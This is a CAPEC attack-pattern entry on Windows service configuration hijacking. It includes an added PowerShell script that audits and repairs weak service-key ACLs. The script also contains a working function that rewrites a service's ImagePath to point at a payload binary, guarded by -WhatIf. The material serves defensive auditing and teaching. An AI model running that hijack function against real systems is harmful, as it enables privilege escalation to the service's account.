CAPEC-478 Modification of Windows Service Configuration

CAPEC ID: 478

CAPEC-478 Metadata

Likelihood of Attack

Low

Typical Severity

High

Overview

Summary

An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to have a malicious binary executed in place of the existing service binary, so that the adversary's code runs with the service's privileges (frequently LocalSystem) the next time the service starts.

Prerequisites

The adversary must be able to write to the targeted service's configuration in the Windows Registry, i.e. to its key under HKLM\SYSTEM\CurrentControlSet\Services. In practice this means the key's ACL grants write rights (SetValue, WriteKey or FullControl) to a principal the adversary already controls.

Execution Flow

Step 1 (Explore) [Determine target system]: The adversary first selects the system whose registry they wish to modify. It must be a Windows machine, since the attack targets the Windows Registry.

Step 2 (Experiment) [Gain access to the system]: The adversary needs access to the system so that they can write to the Windows Registry. Techniques:
  • Gain physical access, for example by shoulder surfing a password or using a system that was left unlocked.
  • Gain remote access through any of a variety of means.

Step 3 (Exploit) [Modify Windows Registry]: The adversary modifies the configuration settings of a service in the Windows Registry. Specifically, they change the path settings (the service's ImagePath value) so that they point to a malicious binary, which is executed the next time the service starts.

Potential Solutions / Mitigations

Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.
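The following PowerShell script is an added example and is not part of the CAPEC entry. It covers both step 3 of the execution flow and the mitigation above: it audits every key under HKLM\SYSTEM\CurrentControlSet\Services for Allow ACEs that give broad, low-privileged principals write rights, shows the exact registry write an adversary would make against such a key (guarded by -WhatIf so it can be rehearsed without changing anything), and removes the offending ACEs. The list of "weak" principals, the service name VulnSvc and the payload path C:\Users\Public\payload.exe are assumptions chosen for illustration.

```powershell
# Added example, not CAPEC's own material. Service key audit, hijack demo
# and ACL repair for HKLM\SYSTEM\CurrentControlSet\Services.
# Assumptions: the principals below count as "weak"; the service name and
# payload path in the usage lines at the bottom are placeholders.

$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Principals that should never hold write rights on a service key (assumption).
$WeakPrincipals = @(
    'Everyone', 'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
)

# Registry rights that allow rewriting ImagePath or the key's own security.
$WriteRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
               [System.Security.AccessControl.RegistryRights]::WriteKey -bor
               [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
               [System.Security.AccessControl.RegistryRights]::TakeOwnership -bor
               [System.Security.AccessControl.RegistryRights]::FullControl

function Get-WeakServiceKeyAcl {
    # Mitigation check: one object per Allow ACE that grants a weak principal
    # write rights on a service key. Keys we cannot read are skipped.
    Get-ChildItem -Path $ServicesRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.RegistryRights -band $WriteRights) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
                # svchost-hosted services point ImagePath at svchost.exe; for
                # those the interesting value is Parameters\ServiceDll instead.
                ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

function Invoke-ServiceImagePathHijack {
    # Execution flow step 3: repoint ImagePath at an attacker-controlled binary.
    # Returns the original ImagePath so a test can restore it. Use -WhatIf to rehearse.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$MaliciousBinary
    )
    $keyPath  = Join-Path $ServicesRoot $ServiceName
    $original = (Get-ItemProperty -Path $keyPath -Name ImagePath).ImagePath
    if ($PSCmdlet.ShouldProcess($keyPath, "Set ImagePath '$original' -> '$MaliciousBinary'")) {
        # The payload runs under the service account at the next start
        # (reboot, or Restart-Service if the caller can also control the service).
        Set-ItemProperty -Path $keyPath -Name ImagePath -Value $MaliciousBinary
    }
    return $original
}

function Remove-WeakServiceKeyAce {
    # Mitigation: strip explicit write-capable Allow ACEs for weak principals.
    # Inherited ACEs are left alone here; they must be fixed on the parent key.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(Mandatory)][string]$ServiceName)
    $keyPath = Join-Path $ServicesRoot $ServiceName
    $acl  = Get-Acl -Path $keyPath
    $weak = @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $WeakPrincipals -contains $_.IdentityReference.Value -and
        ($_.RegistryRights -band $WriteRights) -ne 0 -and
        -not $_.IsInherited
    })
    foreach ($ace in $weak) { $null = $acl.RemoveAccessRule($ace) }
    if ($weak.Count -gt 0 -and $PSCmdlet.ShouldProcess($keyPath, "Remove $($weak.Count) weak ACE(s)")) {
        Set-Acl -Path $keyPath -AclObject $acl
    }
    return $weak.Count
}

# Usage (service name and payload path are placeholders):
Get-WeakServiceKeyAcl | Format-Table -AutoSize
# Invoke-ServiceImagePathHijack -ServiceName 'VulnSvc' -MaliciousBinary 'C:\Users\Public\payload.exe' -WhatIf
# Remove-WeakServiceKeyAce -ServiceName 'VulnSvc' -WhatIf
```

Run the audit as an ordinary user as well as an administrator: a key that a standard user can both read and write is the one that turns this pattern into a privilege escalation. On a clean system the audit should return nothing; any hit on a service that runs as LocalSystem deserves immediate remediation and a review of who could have written the key's ImagePath already.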

Related Weaknesses (CWE)

CWE ID Description
CWE-284 Improper Access Control

Related CAPECs

CAPEC ID Name and Description
CAPEC-203 Manipulate Registry Information: An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long-term usage of many registry values, manipulation of registry information could be its own end.

Taxonomy Mappings

Taxonomy: ATTACK

Entry ID Entry Name
T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness
T1543.003 Create or Modify System Process: Windows Service
